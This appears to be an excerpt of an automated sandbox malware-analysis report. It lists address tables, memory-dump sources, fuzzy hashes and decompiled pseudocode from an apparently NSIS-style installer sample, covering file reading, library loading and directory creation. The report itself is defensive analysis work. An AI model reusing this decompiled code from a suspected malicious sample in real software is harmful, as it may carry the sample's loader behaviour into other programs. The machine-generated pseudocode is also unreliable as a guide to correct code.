              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
              • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
              • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B11C75, Relevance: 4.9, APIs: 3, Instructions: 431COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ec9ba146dbbcc85aec9052d1e74b6de6d1b682aae0c5158e2a3c149b4d4a0d7
              • Instruction ID: 042bbab8b00641a0437b621fb8c438364d8116112d094145126b339cc0863bdf
              • Opcode Fuzzy Hash: 2ec9ba146dbbcc85aec9052d1e74b6de6d1b682aae0c5158e2a3c149b4d4a0d7
              • Instruction Fuzzy Hash: 9BF11E25A50398A9EB60CBE4EC55FFDB3B5AF48710F205497E60CEA190E7704AD0DB19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403411, Relevance: 4.6, APIs: 3, Instructions: 101COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00403411(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x3770f
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a270 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402FC6(1);
					return 0;
				}
				E00403590( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0x3f4d2
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E0040357A(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a274 != 0 &&  *0x42a320 == 0) {
						_t19 =  *0x420f00; // 0x31437
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E00402FC6(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406AAC(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40ff7b
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x3770f
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E004060E4( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















              0x00403414
              0x00403421
              0x00403434
              0x00403439
              0x00403569
              0x0040356b
              0x00000000
              0x00403571
              0x00403445
              0x00403458
              0x0040345e
              0x00403464
              0x0040346f
              0x0040346f
              0x00403474
              0x00403479
              0x00403481
              0x00403483
              0x00403483
              0x0040348c
              0x00403493
              0x00000000
              0x00000000
              0x00403499
              0x0040349f
              0x004034a5
              0x00000000
              0x004034ab
              0x004034b1
              0x004034bb
              0x004034d1
              0x004034d6
              0x004034db
              0x004034e1
              0x004034e7
              0x004034f1
              0x004034f8
              0x00000000
              0x00000000
              0x004034fa
              0x00403500
              0x00403502
              0x00403525
              0x0040352b
              0x00000000
              0x00000000
              0x0040352d
              0x0040352f
              0x00000000
              0x00000000
              0x00403531
              0x00403531
              0x00403544
              0x00000000
              0x00000000
              0x00403553
              0x00000000
              0x00403553
              0x0040350c
              0x00403513
              0x00403560
              0x00403566
              0x00403566
              0x00000000
              0x00403566
              0x00403515
              0x0040351b
              0x00403521
              0x00000000
              0x00000000
              0x00000000
              0x00403564
              0x00403564
              0x00000000
              0x00403564
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 00403425
                • Part of subcall function 00403590: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 00403458
              • SetFilePointer.KERNELBASE(0003770F,00000000,00000000,00414EF0,00004000,?,00000000,0040333B,00000004,00000000,00000000,?,?,004032B5,000000FF,00000000), ref: 00403553
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer$CountTick
              • String ID:
              • API String ID: 1092082344-0
              • Opcode ID: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction ID: 897ba5cc79bc3f0d18eddf3670deff7b1eb1d467b83339ddcdcbfe179e357187
              • Opcode Fuzzy Hash: 9518b2dd1af65febbd9d180445f0764cbeb29eb017de111e17892d6d002d9159
              • Instruction Fuzzy Hash: D3317CB2604205EBCB20DF39FE848263BA9B744395755023BE900B32F1C7B99D45DB9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004020D0, Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E004020D0(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a338");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a308 =  *0x42a308 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402D3E(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402D3E(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E004069A0(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004055A4(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403BAB( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










              0x004020d0
              0x004020d0
              0x004020d5
              0x004020dc
              0x0040219b
              0x004022e9
              0x004022e9
              0x00402bc2
              0x00402bc5
              0x00402bd1
              0x00402bd1
              0x004020eb
              0x004020f5
              0x004020f8
              0x00402108
              0x0040210c
              0x00402112
              0x00402114
              0x00402117
              0x00402194
              0x00000000
              0x00402194
              0x00402119
              0x00402124
              0x00402128
              0x00402168
              0x0040212a
              0x0040212d
              0x00402130
              0x0040215c
              0x00402132
              0x00402135
              0x0040213e
              0x00402140
              0x00402140
              0x0040213e
              0x00402130
              0x00402170
              0x00402189
              0x00402189
              0x00000000
              0x00402170
              0x004020fb
              0x00402103
              0x00402106
              0x00000000
              0x00000000
              0x00000000

              APIs
              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
              • String ID:
              • API String ID: 334405425-0
              • Opcode ID: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction ID: f92bc13af20f738db02ac2fc0b39f0a9d6660206439d55b7b5299bd0a9e162c8
              • Opcode Fuzzy Hash: 281a0d6ea35f89f6621ff779b54ca6ec35bae43d7113f061e7420eb1a16a743d
              • Instruction Fuzzy Hash: 4521C671600204EBCF10AFA5CE48A9E7B70AF44358F70413BF511B91E1C7BD8E82966E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403309, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E00403309(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2d8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403411(4);
				if(_t22 >= 0) {
					_t24 = E004060B5( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403411(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004060B5( *0x40a01c, 0x414ef0, _t28) == 0) {
											goto L18;
										}
										_t30 = E004060E4(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














              0x0040330d
              0x00403316
              0x0040331f
              0x00403323
              0x0040332e
              0x0040332e
              0x00403336
              0x0040333d
              0x0040334f
              0x00403356
              0x004033fb
              0x004033fb
              0x00000000
              0x0040335c
              0x0040335f
              0x0040336b
              0x0040336f
              0x00403409
              0x00403409
              0x00403375
              0x00403378
              0x004033d7
              0x004033dd
              0x004033df
              0x004033df
              0x004033f1
              0x004033f9
              0x00403400
              0x00403403
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040337a
              0x0040337d
              0x00000000
              0x00403383
              0x00403388
              0x0040338f
              0x00403392
              0x00403394
              0x00403394
              0x004033a1
              0x004033ab
              0x00000000
              0x00000000
              0x004033b4
              0x004033bb
              0x004033d3
              0x004033fd
              0x004033fd
              0x004033bd
              0x004033bd
              0x004033c0
              0x004033c3
              0x004033c9
              0x004033cf
              0x00000000
              0x004033d1
              0x00000000
              0x004033d1
              0x004033cf
              0x00000000
              0x004033bb
              0x00000000
              0x00403388
              0x0040337d
              0x00403378
              0x0040336f
              0x00403356
              0x0040340b
              0x0040340e

              APIs
              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
              • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
              • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004015C1, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402D3E(0xfffffff0);
				_t17 = E00405EBC(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E3E(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AF0( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B0D(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A73( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653C(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











              0x004015c1
              0x004015c9
              0x004015cc
              0x004015d1
              0x004015d5
              0x004015d7
              0x004015df
              0x004015e1
              0x004015e4
              0x004015ea
              0x00401604
              0x00401607
              0x004015ec
              0x004015ec
              0x004015ef
              0x00000000
              0x004015fa
              0x004015fd
              0x004015fd
              0x004015ef
              0x0040160e
              0x00401615
              0x00401624
              0x00401624
              0x00401617
              0x0040161a
              0x00401622
              0x00000000
              0x00000000
              0x00401622
              0x00401615
              0x00401627
              0x0040162b
              0x0040162c
              0x004015d7
              0x00401634
              0x00401663
              0x004022e9
              0x00401636
              0x00401638
              0x00401645
              0x0040164d
              0x00401655
              0x0040165b
              0x0040165b
              0x00401655
              0x00402bc5
              0x00402bd1

              APIs
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 00405A73: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID:
              • API String ID: 1892508949-0
              • Opcode ID: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
              • Opcode Fuzzy Hash: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a2b0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}










              0x0040138a
              0x004013fa
              0x0040139b
              0x004013a0
              0x00000000
              0x00000000
              0x004013a2
              0x004013a3
              0x004013ad
              0x00000000
              0x00401404
              0x004013b0
              0x004013b7
              0x004013bd
              0x004013be
              0x004013c0
              0x004013c2
              0x004013b9
              0x004013b9
              0x004013ba
              0x004013ba
              0x004013c9
              0x004013cb
              0x004013f4
              0x004013f4
              0x004013c9
              0x00000000

              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
              • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
              • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406931, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406931(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004068C1(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





              0x00406939
              0x0040693c
              0x00406943
              0x0040694b
              0x00406957
              0x00000000
              0x0040695e
              0x0040694e
              0x00406955
              0x00000000
              0x00406966
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
              • Opcode Fuzzy Hash: ce5542d5707cc7159b18b1f0655ddf6d95a06601bb2a9cb3f5ee38c39b2b28c7
              • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
              Uniqueness

              Uniqueness Score: -1.00%

